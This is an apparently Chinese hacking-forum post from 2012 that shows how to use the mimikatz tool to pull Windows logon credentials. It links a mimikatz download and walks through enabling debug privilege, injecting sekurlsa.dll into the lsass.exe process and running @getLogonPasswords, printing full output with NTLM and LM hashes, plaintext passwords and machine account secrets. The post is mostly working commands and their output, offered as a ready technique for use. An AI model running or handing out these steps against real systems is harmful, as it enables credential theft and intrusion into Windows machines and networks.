切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
156 HASH攻击 mimikatz 获得密码[复制链接]
发表于 2012-9-19 01:55:16 | 显示全部楼层 |!read_mode!

和WCE一样能获得明文密码

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

运行他

  1. C:\mimikatz_trunk\Win32>mimikatz
  2. mimikatz 1.0 x86 (beta) /* Traitement du Kiwi (Jun 24 2012 20:08:37) */
  3. // http://blog.gentilkiwi.com/mimikatz
复制代码
调试模式

  1. mimikatz # privilege::debug
  2. Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
复制代码
注入进程

  1. mimikatz # inject::process lsass.exe sekurlsa.dll
  2. PROCESSENTRY32(lsass.exe).th32ProcessID = 668
  3. Attente de connexion du client...
  4. Serveur connecté à un client !
  5. Message du processus :
  6. Bienvenue dans un processus distant
  7.                         Gentil Kiwi

  8. SekurLSA : librairie de manipulation des données de sécurités dans LSASS
复制代码
获得密码

  1. mimikatz # @getLogonPasswords

  2. Authentification Id         : 0;41196
  3. Package d'authentification  : NTLM
  4. Utilisateur principal       : brk
  5. Domaine d'authentification  : DIS9TEAM-WEB
  6.         msv1_0 :        lm{ 40f0e060a09010a0a0304050504040e0 }, ntlm{ 20d070d050
  7. d05090b080507070808040 }
  8.         wdigest :       123456
  9.         kerberos :      123456

  10. Authentification Id         : 0;997
  11. Package d'authentification  : Negotiate
  12. Utilisateur principal       : LOCAL SERVICE
  13. Domaine d'authentification  : NT AUTHORITY
  14.         msv1_0 :        n.t. (LUID KO)
  15.         wdigest :       n.t. (LUID KO)
  16.         kerberos :

  17. Authentification Id         : 0;996
  18. Package d'authentification  : Negotiate
  19. Utilisateur principal       : NETWORK SERVICE
  20. Domaine d'authentification  : NT AUTHORITY
  21.         msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ fad184a763
  22. 467005fff4eaa6e431977b }
  23.         wdigest :       xi0v:if!nF?QR*])vuY4o\P&=i7p%w+#,^(de7 R?'SU)w?OEQ<fE@Es
  24. So $3xPSS@WMc]&Ke"e(l+?">J\LdL<<L,w&NI Q$5BkeV;!A/bP7^#,PBmpsE#1
  25.         kerberos :      xi0v:if!nF?QR*])vuY4o\P&=i7p%w+#,^(de7 R?'SU)w?OEQ<fE@Es
  26. So $3xPSS@WMc]&Ke"e(l+?">J\LdL<<L,w&NI Q$5BkeV;!A/bP7^#,PBmpsE#1

  27. Authentification Id         : 0;32736
  28. Package d'authentification  : NTLM
  29. Utilisateur principal       :
  30. Domaine d'authentification  :
  31.         msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ fad184a763
  32. 467005fff4eaa6e431977b }
  33.         wdigest :       n.t. (LUID KO)
  34.         kerberos :      n.t. (LUID KO)

  35. Authentification Id         : 0;999
  36. Package d'authentification  : Negotiate
  37. Utilisateur principal       : DIS9TEAM-WEB$
  38. Domaine d'authentification  : DIS9
  39.         msv1_0 :        n.t. (LUID KO)
  40.         wdigest :       xi0v:if!nF?QR*])vuY4o\P&=i7p%w+#,^(de7 R?'SU)w?OEQ<fE@Es
  41. So $3xPSS@WMc]&Ke"e(l+?">J\LdL<<L,w&NI Q$5BkeV;!A/bP7^#,PBmpsE#1
  42.         kerberos :

  43. mimikatz #
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-21 00:41

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部